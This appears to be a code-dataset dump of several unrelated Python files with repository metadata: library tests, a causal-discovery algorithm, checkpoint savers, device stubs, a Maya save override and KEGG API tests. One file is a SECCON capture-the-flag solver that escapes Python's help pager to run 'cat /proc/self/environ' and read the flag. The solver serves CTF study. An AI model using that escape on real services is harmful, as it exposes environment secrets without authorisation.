" while timer running.".format(delta))
self._last += delta
return self._last
| 0 | 0 | 0 |
f8d8a660a477cb907594f894ae2d27bc145020dd | 2,428 | py | Python | tests/test_core.py | bkolodziej/postmarker | ff41941213731e7ae27639452cca6e622c560b51 | [
"MIT"
] | null | null | null | tests/test_core.py | bkolodziej/postmarker | ff41941213731e7ae27639452cca6e622c560b51 | [
"MIT"
] | null | null | null | tests/test_core.py | bkolodziej/postmarker | ff41941213731e7ae27639452cca6e622c560b51 | [
"MIT"
] | null | null | null | # coding: utf-8
import pytest
from requests import HTTPError, Response
from postmarker.core import USER_AGENT, PostmarkClient
from postmarker.models.messages import MessageManager, OutboundMessageManager
from postmarker.models.triggers import TriggersManager
@pytest.mark.parametrize("klass", (PostmarkClient, OutboundMessageManager, MessageManager, TriggersManager))
| 39.16129 | 118 | 0.687809 | # coding: utf-8
import pytest
from requests import HTTPError, Response
from postmarker.core import USER_AGENT, PostmarkClient
from postmarker.models.messages import MessageManager, OutboundMessageManager
from postmarker.models.triggers import TriggersManager
class TestClient:
    """Tests for PostmarkClient construction and request dispatch."""
    def test_server_client(self, postmark, server_token, postmark_request):
        """A call() must hit the API root with the token/UA headers set."""
        postmark.call("GET", "endpoint")
        postmark_request.assert_called_with(
            "GET",
            "https://api.postmarkapp.com/endpoint",
            headers={"X-Postmark-Server-Token": server_token, "Accept": "application/json", "User-Agent": USER_AGENT},
            params={},
            json=None,
            timeout=None,
        )
    def test_no_token(self):
        """Constructing a client without a token must fail loudly."""
        with pytest.raises(AssertionError) as exc:
            PostmarkClient(None)
        assert str(exc.value).startswith("You have to provide token to use Postmark API")
    def test_repr(self, postmark, server_token):
        """repr() should expose the class name and the server token."""
        assert repr(postmark) == "<PostmarkClient: %s>" % server_token
    @pytest.mark.parametrize(
        "config, kwargs",
        (
            ({"POSTMARK_SERVER_TOKEN": "foo", "POSTMARK_TIMEOUT": 1}, {"is_uppercase": True}),
            ({"postmark_server_token": "foo", "postmark_timeout": 1}, {"is_uppercase": False}),
        ),
    )
    def test_from_config(self, config, kwargs):
        """from_config must read prefixed keys in either letter case."""
        instance = PostmarkClient.from_config(config, **kwargs)
        assert instance.server_token == "foo"
        assert instance.timeout == 1
        assert instance.account_token is None
@pytest.mark.parametrize("klass", (PostmarkClient, OutboundMessageManager, MessageManager, TriggersManager))
class TestManagersSetup:
    """Sanity checks on the _managers registry of each client/manager class."""
    def test_duplicate_names(self, klass):
        """Every registered manager name must be unique."""
        managers_names = [manager.name for manager in klass._managers]
        assert len(managers_names) == len(set(managers_names)), "Defined managers names are not unique"
    def test_names_overriding(self, klass):
        """No manager name may shadow an existing attribute of the class."""
        assert not any(
            manager.name in dir(klass) for manager in klass._managers
        ), "Defined managers names override client's members"
def test_malformed_request(postmark, postmark_request):
    """A non-2xx API response must surface as requests.HTTPError carrying the body text."""
    postmark_request.return_value = Response()
    postmark_request.return_value.status_code = 500
    postmark_request.return_value._content = b"Server Error"
    # The pytest.raises keyword is ``match`` (regex-searched against
    # str(excinfo.value)); the original ``matches=`` is not a valid
    # argument and makes pytest error out instead of running the test.
    with pytest.raises(HTTPError, match="Server Error"):
        postmark.call("GET", "endpoint")
b772ff19286a45abc84c84815346c862a4cd284d | 3,257 | py | Python | python/uptune/plugins/causaldiscovery.py | Hecmay/uptune | 20a1462c772041b8d1b99f326b372284896faaba | [
"BSD-3-Clause"
] | 29 | 2020-06-19T18:07:38.000Z | 2022-01-03T23:06:53.000Z | python/uptune/plugins/causaldiscovery.py | Hecmay/uptune | 20a1462c772041b8d1b99f326b372284896faaba | [
"BSD-3-Clause"
] | 4 | 2020-07-14T16:20:23.000Z | 2021-05-15T13:56:24.000Z | python/uptune/plugins/causaldiscovery.py | Hecmay/uptune | 20a1462c772041b8d1b99f326b372284896faaba | [
"BSD-3-Clause"
] | 2 | 2020-06-20T00:43:23.000Z | 2020-12-26T00:38:31.000Z | """Implementation of the simple 50-line version of NOTEARS algorithm.
Defines the h function, the augmented Lagrangian, and its gradient.
Each augmented Lagrangian subproblem is minimized by L-BFGS-B from scipy.
Note: this version implements NOTEARS without l1 regularization,
i.e. lambda = 0, hence it requires n >> d.
"""
import numpy as np
import scipy.linalg as slin
import scipy.optimize as sopt
def notears(X: np.ndarray,
            max_iter: int = 100,
            h_tol: float = 1e-8,
            w_threshold: float = 1e-1) -> np.ndarray:
    """Solve min_W ell(W; X) s.t. h(W) = 0 using augmented Lagrangian.

    Args:
        X: [n,d] sample matrix
        max_iter: max number of dual ascent steps
        h_tol: exit if |h(w)| <= h_tol
        w_threshold: fixed threshold for edge weights

    Returns:
        W_est: [d,d] estimate
    """

    def _h(w):
        # Acyclicity measure: h(W) = tr(exp(W * W)) - d, zero iff W is a DAG.
        W = w.reshape([d, d])
        return np.trace(slin.expm(W * W)) - d

    def _func(w):
        # Augmented Lagrangian objective: least-squares loss + rho/2*h^2 + alpha*h.
        W = w.reshape([d, d])
        loss = 0.5 / n * np.square(np.linalg.norm(X.dot(np.eye(d, d) - W), 'fro'))
        h = _h(W)
        return loss + 0.5 * rho * h * h + alpha * h

    def _grad(w):
        # Gradient of _func with respect to the flattened W.
        W = w.reshape([d, d])
        loss_grad = - 1.0 / n * X.T.dot(X).dot(np.eye(d, d) - W)
        E = slin.expm(W * W)
        obj_grad = loss_grad + (rho * (np.trace(E) - d) + alpha) * E.T * W * 2
        return obj_grad.flatten()

    n, d = X.shape
    w_est, w_new = np.zeros(d * d), np.zeros(d * d)
    rho, alpha, h, h_new = 1.0, 0.0, np.inf, np.inf
    # Project-specific constraint: edges touching the first 4 nodes and all
    # self-loops are pinned to zero via (0, 0) box bounds.
    mask = lambda x, y: True if x < 4 or y < 4 or x == y else False
    bnds = [(0, 0) if mask(i, j) else (None, None) for i in range(d) for j in range(d)]
    for _ in range(max_iter):
        # Escalate rho until the acyclicity violation shrinks enough.
        while rho < 1e+20:
            sol = sopt.minimize(_func, w_est, method='L-BFGS-B', jac=_grad, bounds=bnds)
            w_new = sol.x
            h_new = _h(w_new)
            if h_new > 0.25 * h:
                rho *= 10
            else:
                break
        w_est, h = w_new, h_new
        alpha += rho * h  # dual ascent step
        if h <= h_tol:
            break
    w_est[np.abs(w_est) < w_threshold] = 0
    return w_est.reshape([d, d])
if __name__ == '__main__':
import glog as log
import networkx as nx
import utils
# configurations
n, d = 1000, 10
graph_type, degree, sem_type = 'erdos-renyi', 4, 'linear-gauss'
log.info('Graph: %d node, avg degree %d, %s graph', d, degree, graph_type)
log.info('Data: %d samples, %s SEM', n, sem_type)
# graph
log.info('Simulating graph ...')
G = utils.simulate_random_dag(d, degree, graph_type)
log.info('Simulating graph ... Done')
# data
log.info('Simulating data ...')
X = utils.simulate_sem(G, n, sem_type)
log.info('Simulating data ... Done')
# solve optimization problem
log.info('Solving equality constrained problem ...')
W_est = notears(X)
G_est = nx.DiGraph(W_est)
log.info('Solving equality constrained problem ... Done')
# evaluate
fdr, tpr, fpr, shd, nnz = utils.count_accuracy(G, G_est)
log.info('Accuracy: fdr %f, tpr %f, fpr %f, shd %d, nnz %d',
fdr, tpr, fpr, shd, nnz)
| 32.247525 | 88 | 0.569543 | """Implementation of the simple 50-line version of NOTEARS algorithm.
Defines the h function, the augmented Lagrangian, and its gradient.
Each augmented Lagrangian subproblem is minimized by L-BFGS-B from scipy.
Note: this version implements NOTEARS without l1 regularization,
i.e. lambda = 0, hence it requires n >> d.
"""
import numpy as np
import scipy.linalg as slin
import scipy.optimize as sopt
def notears(X: np.ndarray,
            max_iter: int = 100,
            h_tol: float = 1e-8,
            w_threshold: float = 1e-1) -> np.ndarray:
    """Solve min_W ell(W; X) s.t. h(W) = 0 using augmented Lagrangian.

    Args:
        X: [n,d] sample matrix
        max_iter: max number of dual ascent steps
        h_tol: exit if |h(w)| <= h_tol
        w_threshold: fixed threshold for edge weights

    Returns:
        W_est: [d,d] estimate
    """

    def _h(w):
        # Acyclicity measure: h(W) = tr(exp(W * W)) - d, zero iff W is a DAG.
        W = w.reshape([d, d])
        return np.trace(slin.expm(W * W)) - d

    def _func(w):
        # Augmented Lagrangian objective: least-squares loss + rho/2*h^2 + alpha*h.
        W = w.reshape([d, d])
        loss = 0.5 / n * np.square(np.linalg.norm(X.dot(np.eye(d, d) - W), 'fro'))
        h = _h(W)
        return loss + 0.5 * rho * h * h + alpha * h

    def _grad(w):
        # Gradient of _func with respect to the flattened W.
        W = w.reshape([d, d])
        loss_grad = - 1.0 / n * X.T.dot(X).dot(np.eye(d, d) - W)
        E = slin.expm(W * W)
        obj_grad = loss_grad + (rho * (np.trace(E) - d) + alpha) * E.T * W * 2
        return obj_grad.flatten()

    n, d = X.shape
    w_est, w_new = np.zeros(d * d), np.zeros(d * d)
    rho, alpha, h, h_new = 1.0, 0.0, np.inf, np.inf
    # Project-specific constraint: edges touching the first 4 nodes and all
    # self-loops are pinned to zero via (0, 0) box bounds.
    mask = lambda x, y: True if x < 4 or y < 4 or x == y else False
    bnds = [(0, 0) if mask(i, j) else (None, None) for i in range(d) for j in range(d)]
    for _ in range(max_iter):
        # Escalate rho until the acyclicity violation shrinks enough.
        while rho < 1e+20:
            sol = sopt.minimize(_func, w_est, method='L-BFGS-B', jac=_grad, bounds=bnds)
            w_new = sol.x
            h_new = _h(w_new)
            if h_new > 0.25 * h:
                rho *= 10
            else:
                break
        w_est, h = w_new, h_new
        alpha += rho * h  # dual ascent step
        if h <= h_tol:
            break
    # (Removed leftover debug print of the raw weight vector.)
    w_est[np.abs(w_est) < w_threshold] = 0
    return w_est.reshape([d, d])
if __name__ == '__main__':
    # Demo / smoke test: requires the project-local `utils` module plus
    # glog and networkx (not stdlib).
    import glog as log
    import networkx as nx
    import utils
    # configuration: 10-node Erdos-Renyi graph, avg degree 4, linear-Gaussian SEM
    n, d = 1000, 10
    graph_type, degree, sem_type = 'erdos-renyi', 4, 'linear-gauss'
    log.info('Graph: %d node, avg degree %d, %s graph', d, degree, graph_type)
    log.info('Data: %d samples, %s SEM', n, sem_type)
    # simulate a random ground-truth DAG
    log.info('Simulating graph ...')
    G = utils.simulate_random_dag(d, degree, graph_type)
    log.info('Simulating graph ... Done')
    # sample observational data from the SEM defined by G
    log.info('Simulating data ...')
    X = utils.simulate_sem(G, n, sem_type)
    log.info('Simulating data ... Done')
    # estimate the weighted adjacency matrix with NOTEARS
    log.info('Solving equality constrained problem ...')
    W_est = notears(X)
    G_est = nx.DiGraph(W_est)
    log.info('Solving equality constrained problem ... Done')
    # evaluate the estimate against the ground-truth graph
    fdr, tpr, fpr, shd, nnz = utils.count_accuracy(G, G_est)
    log.info('Accuracy: fdr %f, tpr %f, fpr %f, shd %d, nnz %d',
             fdr, tpr, fpr, shd, nnz)
| 469 | 0 | 80 |
1764ce25516ed0b6ecde01f531e8de98d0ffbaf2 | 3,915 | py | Python | laia/common/saver.py | basbeu/PyLaia | d14458484b56622204b1730a7d53220c5d0f1bc1 | [
"MIT"
] | 2 | 2020-09-10T13:31:17.000Z | 2021-07-31T09:44:17.000Z | laia/common/saver.py | basbeu/PyLaia | d14458484b56622204b1730a7d53220c5d0f1bc1 | [
"MIT"
] | 1 | 2020-12-06T18:11:52.000Z | 2020-12-06T18:19:38.000Z | laia/common/saver.py | basbeu/PyLaia | d14458484b56622204b1730a7d53220c5d0f1bc1 | [
"MIT"
] | 2 | 2020-04-20T13:40:56.000Z | 2020-10-17T11:59:55.000Z | from __future__ import absolute_import
import inspect
import os
from collections import deque
from typing import Any, Optional, Callable
import torch
from laia.common.logging import get_logger
from laia.common.random import get_rng_state
_logger = get_logger(__name__)
class RollingSaver(Saver):
"""Saver wrapper that keeps a maximum number of files"""
| 29.43609 | 77 | 0.597957 | from __future__ import absolute_import
import inspect
import os
from collections import deque
from typing import Any, Optional, Callable
import torch
from laia.common.logging import get_logger
from laia.common.random import get_rng_state
_logger = get_logger(__name__)
class Saver(object):
def __call__(self, *args, **kwargs):
return self.save(*args, **kwargs)
def save(self, *args, **kwargs):
raise NotImplementedError
class BasicSaver(Saver):
def save(self, obj, filepath):
# type: (Any, str) -> str
dirname = os.path.dirname(os.path.normpath(filepath))
if dirname and not os.path.exists(dirname):
os.makedirs(dirname)
torch.save(obj, filepath)
return filepath
class ObjectSaver(Saver):
def __init__(self, filepath):
# type: (str) -> None
self._filepath = filepath
self._basic_saver = BasicSaver()
def save(self, func_or_class, *args, **kwargs):
# type: (Callable, *Any, **Any) -> str
return self._basic_saver.save(
{
"module": inspect.getmodule(func_or_class).__name__,
"name": func_or_class.__name__,
"args": args,
"kwargs": kwargs,
},
self._filepath,
)
class ModelSaver(ObjectSaver):
def __init__(self, save_path, filename="model"):
# type: (str, str) -> None
super(ModelSaver, self).__init__(os.path.join(save_path, filename))
def save(self, func, *args, **kwargs):
# type: (Callable, *Any, **Any) -> str
path = super(ModelSaver, self).save(func, *args, **kwargs)
_logger.debug("Saved model {}", path)
return path
class CheckpointSaver(Saver):
def __init__(self, filepath):
# type: (str) -> None
self._filepath = filepath
self._basic_saver = BasicSaver()
def get_ckpt(self, suffix):
# type: (str) -> str
return (
"{}-{}".format(self._filepath, suffix)
if suffix is not None
else self._filepath
)
def save(self, state, suffix=None):
# type: (Any, Optional[str]) -> str
path = self._basic_saver.save(state, self.get_ckpt(suffix))
_logger.debug("Saved checkpoint {}", path)
return path
class ModelCheckpointSaver(Saver):
def __init__(self, ckpt_saver, model):
# type: (CheckpointSaver, torch.nn.Module) -> None
self._ckpt_saver = ckpt_saver
self._model = model
def save(self, suffix=None):
return self._ckpt_saver.save(self._model.state_dict(), suffix=suffix)
class StateCheckpointSaver(Saver):
def __init__(self, ckpt_saver, obj, device=None):
# type: (CheckpointSaver, Any, Optional[torch.Device]) -> None
self._ckpt_saver = ckpt_saver
self._obj = obj
self._device = device
def save(self, suffix=None):
# type: (Optional[str]) -> str
state = self._obj.state_dict()
state["rng"] = get_rng_state(device=self._device)
return self._ckpt_saver.save(state, suffix=suffix)
class RollingSaver(Saver):
"""Saver wrapper that keeps a maximum number of files"""
def __init__(self, saver, keep=5):
# type: (Saver, int) -> None
assert keep > 0
self._saver = saver
self._keep = keep
self._last_saved = deque()
def save(self, *args, **kwargs):
# type: (*Any, **Any) -> str
path = self._saver.save(*args, **kwargs)
if len(self._last_saved) >= self._keep:
last = self._last_saved.popleft()
try:
os.remove(last)
_logger.debug("{} checkpoint removed", last)
except OSError:
# Someone else removed the checkpoint, not a big deal
pass
self._last_saved.append(path)
return path
| 2,910 | 49 | 586 |
05aef0a5ed1d687ca3c231945b2ae82f59819513 | 1,098 | py | Python | stubs/m5stack_flowui-v1_4_0-beta/flowlib/modules/_lego.py | mattytrentini/micropython-stubs | 4d596273823b69e9e5bcf5fa67f249c374ee0bbc | [
"MIT"
] | null | null | null | stubs/m5stack_flowui-v1_4_0-beta/flowlib/modules/_lego.py | mattytrentini/micropython-stubs | 4d596273823b69e9e5bcf5fa67f249c374ee0bbc | [
"MIT"
] | null | null | null | stubs/m5stack_flowui-v1_4_0-beta/flowlib/modules/_lego.py | mattytrentini/micropython-stubs | 4d596273823b69e9e5bcf5fa67f249c374ee0bbc | [
"MIT"
] | null | null | null | """
Module: 'flowlib.modules._lego' on M5 FlowUI v1.4.0-beta
"""
# MCU: (sysname='esp32', nodename='esp32', release='1.11.0', version='v1.11-284-g5d8e1c867 on 2019-08-30', machine='ESP32 module with ESP32')
# Stubber: 1.3.1 - updated
from typing import Any
ENCODER_ADDR = 4
class Lego:
""""""
class Lego_Motor:
""""""
M5GO_WHEEL_ADDR = 86
MOTOR_CTRL_ADDR = 0
i2c_bus = None
machine = None
module = None
motor1_pwm = 0
motor2_pwm = 0
os = None
time = None
ustruct = None
| 15.041096 | 141 | 0.58561 | """
Module: 'flowlib.modules._lego' on M5 FlowUI v1.4.0-beta
"""
# MCU: (sysname='esp32', nodename='esp32', release='1.11.0', version='v1.11-284-g5d8e1c867 on 2019-08-30', machine='ESP32 module with ESP32')
# Stubber: 1.3.1 - updated
from typing import Any
ENCODER_ADDR = 4
class Lego:
""""""
def deinit(self, *argv) -> Any:
pass
class Lego_Motor:
""""""
def _available(self, *argv) -> Any:
pass
def _read_encoder(self, *argv) -> Any:
pass
def deinit(self, *argv) -> Any:
pass
def position_update(self, *argv) -> Any:
pass
def read_encoder(self, *argv) -> Any:
pass
def run_distance(self, *argv) -> Any:
pass
def run_to(self, *argv) -> Any:
pass
def set_pwm(self, *argv) -> Any:
pass
def stop(self, *argv) -> Any:
pass
M5GO_WHEEL_ADDR = 86
MOTOR_CTRL_ADDR = 0
def const():
pass
def constrain():
pass
def dead_area():
pass
i2c_bus = None
machine = None
module = None
motor1_pwm = 0
motor2_pwm = 0
os = None
time = None
ustruct = None
| 269 | 0 | 339 |
dd73c4faa59f3a017ba4a70b99f0f13361952ac4 | 342 | py | Python | misc/hitchhike/solver/solver.py | SECCON/SECCON2021_online_CTF | 628008ae2d150723352aed2c95abff41501c51f2 | [
"Apache-2.0"
] | 7 | 2022-02-07T10:15:22.000Z | 2022-02-10T07:13:07.000Z | misc/hitchhike/solver/solver.py | SECCON/SECCON2021_online_CTF | 628008ae2d150723352aed2c95abff41501c51f2 | [
"Apache-2.0"
] | null | null | null | misc/hitchhike/solver/solver.py | SECCON/SECCON2021_online_CTF | 628008ae2d150723352aed2c95abff41501c51f2 | [
"Apache-2.0"
] | null | null | null | from ptrlib import *
import os
HOST = os.getenv('SECCON_HOST', "localhost")
PORT = os.getenv('SECCON_PORT', "10042")
sock = Socket(HOST, int(PORT))
sock.sendlineafter("value 2: ", "help()")
sock.sendlineafter("help> ", "+")
sock.sendlineafter("--More--", "!/bin/cat /proc/self/environ")
print(sock.recvregex("SECCON\{.+\}"))
sock.close()
| 22.8 | 62 | 0.666667 | from ptrlib import *
import os
HOST = os.getenv('SECCON_HOST', "localhost")
PORT = os.getenv('SECCON_PORT', "10042")
sock = Socket(HOST, int(PORT))
sock.sendlineafter("value 2: ", "help()")
sock.sendlineafter("help> ", "+")
sock.sendlineafter("--More--", "!/bin/cat /proc/self/environ")
print(sock.recvregex("SECCON\{.+\}"))
sock.close()
| 0 | 0 | 0 |
9f45c32bf8dc8611a369d873f426cb1bc5760aa4 | 908 | py | Python | startup/custom_save.py | ArtFXDev/silex_maya | 90ef3631a1b35656744deaf97b70b1a727fbc3d6 | [
"MIT"
] | 6 | 2021-08-29T19:24:49.000Z | 2022-03-07T03:59:42.000Z | startup/custom_save.py | ArtFXDev/silex_maya | 90ef3631a1b35656744deaf97b70b1a727fbc3d6 | [
"MIT"
] | 31 | 2021-09-17T14:16:55.000Z | 2022-03-31T19:52:27.000Z | startup/custom_save.py | ArtFXDev/silex_maya | 90ef3631a1b35656744deaf97b70b1a727fbc3d6 | [
"MIT"
] | 1 | 2021-12-10T03:17:58.000Z | 2021-12-10T03:17:58.000Z | import maya.cmds as cmds
import maya.mel as mel
| 31.310345 | 115 | 0.692731 | import maya.cmds as cmds
import maya.mel as mel
def custom_save():
save_cmd = "python(\"from silex_client.action.action_query import ActionQuery;ActionQuery('save').execute()\")"
# Hijack save button
cmds.iconTextButton(
u"saveSceneButton", edit=True, command=save_cmd, sourceType="mel"
)
# Hijack save menu item
# New in Maya 2009, we have to explicitly create the file menu before modifying it
mel.eval("buildFileMenu();")
cmds.setParent(u"mainFileMenu", menu=True)
cmds.menuItem(u"saveItem", edit=True, label="Save Scene", command=save_cmd)
# Create ctrl-s save command
cmds.nameCommand(u"NameComSave_File", annotation="silex save", command=save_cmd)
def reset_save():
cmds.nameCommand(
"NameComSave_File", annotation="silex save", command="file -save"
)
cmds.scriptJob(event=["quitApplication", reset_save])
| 836 | 0 | 23 |
c3c33a62d2bab0cee1173d76ded4852bb11c035d | 929 | py | Python | test/py/mapper/test10.py | Ahdhn/lar-cc | 7092965acf7c0c78a5fab4348cf2c2aa01c4b130 | [
"MIT",
"Unlicense"
] | 1 | 2021-06-10T02:06:27.000Z | 2021-06-10T02:06:27.000Z | test/py/mapper/test10.py | Ahdhn/lar-cc | 7092965acf7c0c78a5fab4348cf2c2aa01c4b130 | [
"MIT",
"Unlicense"
] | 1 | 2018-02-20T21:57:07.000Z | 2018-02-21T07:18:11.000Z | test/py/mapper/test10.py | Ahdhn/lar-cc | 7092965acf7c0c78a5fab4348cf2c2aa01c4b130 | [
"MIT",
"Unlicense"
] | 7 | 2016-11-04T10:47:42.000Z | 2018-04-10T17:32:50.000Z | """ Remove double instances of cells (and the unused vertices) """
from larlib import evalStruct
""" Generation of Struct object and transform to LAR model pair """
cubes = larCuboids([10,10,10],True)
V = cubes[0]
FV = cubes[1][-2]
CV = cubes[1][-1]
bcells = boundaryCells(CV,FV)
BV = [FV[f] for f in bcells]
VIEW(EXPLODE(1.2,1.2,1.2)(MKPOLS((V,BV))))
block = Model((V,BV))
struct = Struct(10*[block, t(10,0,0)])
struct = Struct(10*[struct, t(0,10,0)])
struct = Struct(3*[struct, t(0,0,10)])
W,FW = struct2lar(struct)
VIEW(EXPLODE(1.2,1.2,1.2)(MKPOLS((W,FW))))
""" Remove the double instances of cells """
cellDict = defaultdict(list)
for k,cell in enumerate(FW):
cellDict[tuple(cell)] += [k]
FW = [list(key) for key in cellDict.keys() if len(cellDict[key])==1]
VIEW(EXPLODE(1.2,1.2,1.2)(MKPOLS((W,FW))))
""" Remove the unused vertices """
print "len(W) =",len(W)
V,FV = larRemoveVertices(W,FW)
print "len(V) =",len(V)
| 27.323529 | 68 | 0.654467 | """ Remove double instances of cells (and the unused vertices) """
from larlib import evalStruct
""" Generation of Struct object and transform to LAR model pair """
cubes = larCuboids([10,10,10],True)
V = cubes[0]
FV = cubes[1][-2]
CV = cubes[1][-1]
bcells = boundaryCells(CV,FV)
BV = [FV[f] for f in bcells]
VIEW(EXPLODE(1.2,1.2,1.2)(MKPOLS((V,BV))))
block = Model((V,BV))
struct = Struct(10*[block, t(10,0,0)])
struct = Struct(10*[struct, t(0,10,0)])
struct = Struct(3*[struct, t(0,0,10)])
W,FW = struct2lar(struct)
VIEW(EXPLODE(1.2,1.2,1.2)(MKPOLS((W,FW))))
""" Remove the double instances of cells """
cellDict = defaultdict(list)
for k,cell in enumerate(FW):
cellDict[tuple(cell)] += [k]
FW = [list(key) for key in cellDict.keys() if len(cellDict[key])==1]
VIEW(EXPLODE(1.2,1.2,1.2)(MKPOLS((W,FW))))
""" Remove the unused vertices """
print "len(W) =",len(W)
V,FV = larRemoveVertices(W,FW)
print "len(V) =",len(V)
| 0 | 0 | 0 |
b7043aa5902dafc638468e7715efc6dcf2eddc85 | 9,668 | py | Python | Tests/test_KEGG_online.py | fredricj/biopython | 922063e5fec0b3c0c975f030b36eeea962e51091 | [
"BSD-3-Clause"
] | 2 | 2019-10-25T18:20:34.000Z | 2019-10-28T15:26:40.000Z | Tests/test_KEGG_online.py | fredricj/biopython | 922063e5fec0b3c0c975f030b36eeea962e51091 | [
"BSD-3-Clause"
] | null | null | null | Tests/test_KEGG_online.py | fredricj/biopython | 922063e5fec0b3c0c975f030b36eeea962e51091 | [
"BSD-3-Clause"
] | 1 | 2021-01-07T07:55:09.000Z | 2021-01-07T07:55:09.000Z | # Copyright 2014 by Kevin Wu.
# Copyright 2014 by Peter Cock.
# All rights reserved.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""Tests for online functionality of the KEGG module."""
# Builtins
import unittest
from Bio.KEGG.KGML import KGML_parser
from Bio.KEGG.REST import kegg_conv, kegg_find, kegg_get
from Bio.KEGG.REST import kegg_info, kegg_link, kegg_list
from Bio import SeqIO
import requires_internet
requires_internet.check()
# TODO - revert to using with statements once we drop
# Python 2.6 and 2.7, see http://bugs.python.org/issue12487
class KEGGTests(unittest.TestCase):
"""Tests for KEGG REST API."""
class KGMLPathwayTests(unittest.TestCase):
"""Tests with metabolic maps."""
def test_parse_remote_pathway(self):
"""Download a KEGG pathway from the KEGG server and parse KGML."""
h = kegg_get("ko03070", "kgml")
pathway = KGML_parser.read(h)
self.assertEqual(pathway.name, "path:ko03070")
h.close()
if __name__ == "__main__":
runner = unittest.TextTestRunner(verbosity=2)
unittest.main(testRunner=runner)
| 33.453287 | 80 | 0.600434 | # Copyright 2014 by Kevin Wu.
# Copyright 2014 by Peter Cock.
# All rights reserved.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""Tests for online functionality of the KEGG module."""
# Builtins
import unittest
from Bio.KEGG.KGML import KGML_parser
from Bio.KEGG.REST import kegg_conv, kegg_find, kegg_get
from Bio.KEGG.REST import kegg_info, kegg_link, kegg_list
from Bio import SeqIO
import requires_internet
requires_internet.check()
# TODO - revert to using with statements once we drop
# Python 2.6 and 2.7, see http://bugs.python.org/issue12487
class KEGGTests(unittest.TestCase):
"""Tests for KEGG REST API."""
def test_info_kegg(self):
h = kegg_info("kegg")
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/info/kegg")
h.close()
def test_info_pathway(self):
h = kegg_info("pathway")
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/info/pathway")
h.close()
def test_list_pathway(self):
h = kegg_list("pathway")
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/list/pathway")
h.close()
def test_pathway_hsa(self):
h = kegg_list("pathway", "hsa")
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/list/pathway/hsa")
h.close()
def test_list_organism(self):
h = kegg_list("organism")
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/list/organism")
h.close()
def test_list_hsa(self):
h = kegg_list("hsa")
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/list/hsa")
h.close()
def test_list_T01001(self):
h = kegg_list("T01001")
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/list/T01001")
h.close()
def test_list_hsa_10458_plus_ece_Z5100(self):
h = kegg_list("hsa:10458+ece:Z5100")
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/list/hsa:10458+ece:Z5100")
h.close()
def test_list_hsa_10458_list_ece_Z5100(self):
h = kegg_list(["hsa:10458", "ece:Z5100"])
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/list/hsa:10458+ece:Z5100")
h.close()
def test_list_cpd_C01290_plus_gl_G0009(self):
h = kegg_list("cpd:C01290+gl:G00092")
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/list/cpd:C01290+gl:G00092")
h.close()
def test_list_cpd_C01290_list_gl_G0009(self):
h = kegg_list(["cpd:C01290", "gl:G00092"])
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/list/cpd:C01290+gl:G00092")
h.close()
def test_list_C01290_plus_G00092(self):
h = kegg_list("C01290+G00092")
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/list/C01290+G00092")
h.close()
def test_list_C01290_list_G00092(self):
h = kegg_list(["C01290", "G00092"])
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/list/C01290+G00092")
h.close()
def test_find_genes_shiga_plus_toxin(self):
h = kegg_find("genes", "shiga+toxin")
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/find/genes/shiga+toxin")
h.close()
def test_find_genes_shiga_list_toxin(self):
h = kegg_find("genes", ["shiga", "toxin"])
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/find/genes/shiga+toxin")
h.close()
def test_find_compound_C7H10O5_formula(self):
h = kegg_find("compound", "C7H10O5", "formula")
h.read()
self.assertEqual(h.url,
"http://rest.kegg.jp/find/compound/C7H10O5/formula")
h.close()
def test_find_compound_O5C7_formula(self):
h = kegg_find("compound", "O5C7", "formula")
h.read()
self.assertEqual(h.url,
"http://rest.kegg.jp/find/compound/O5C7/formula")
h.close()
def test_find_compound_exact_mass(self):
h = kegg_find("compound", "174.05", "exact_mass")
h.read()
self.assertEqual(h.url,
"http://rest.kegg.jp/find/compound/174.05/exact_mass")
h.close()
def test_find_compound_weight(self):
h = kegg_find("compound", "300-310", "mol_weight")
h.read()
self.assertEqual(h.url,
"http://rest.kegg.jp/find/compound/300-310/mol_weight")
h.close()
def test_get_cpd_C01290_plus_gl_G00092(self):
h = kegg_get("cpd:C01290+gl:G00092")
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/get/cpd:C01290+gl:G00092")
h.close()
def test_get_cpd_C01290_list_gl_G00092(self):
h = kegg_get(["cpd:C01290", "gl:G00092"])
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/get/cpd:C01290+gl:G00092")
h.close()
def test_get_C01290_plus_G00092(self):
h = kegg_get(["C01290+G00092"])
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/get/C01290+G00092")
h.close()
def test_get_C01290_list_G00092(self):
h = kegg_get(["C01290", "G00092"])
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/get/C01290+G00092")
h.close()
def test_get_hsa_10458_plus_ece_Z5100(self):
h = kegg_get("hsa:10458+ece:Z5100")
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/get/hsa:10458+ece:Z5100")
h.close()
def test_get_hsa_10458_list_ece_Z5100(self):
h = kegg_get(["hsa:10458", "ece:Z5100"])
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/get/hsa:10458+ece:Z5100")
h.close()
def test_get_hsa_10458_plus_ece_Z5100_as_aaseq(self):
h = kegg_get("hsa:10458+ece:Z5100", "aaseq")
self.assertEqual(h.url,
"http://rest.kegg.jp/get/hsa:10458+ece:Z5100/aaseq")
data = SeqIO.parse(h, "fasta")
self.assertEqual(len(list(data)), 2)
h.close()
def test_get_hsa_10458_list_ece_Z5100_as_aaseq(self):
h = kegg_get(["hsa:10458", "ece:Z5100"], "aaseq")
self.assertEqual(h.url,
"http://rest.kegg.jp/get/hsa:10458+ece:Z5100/aaseq")
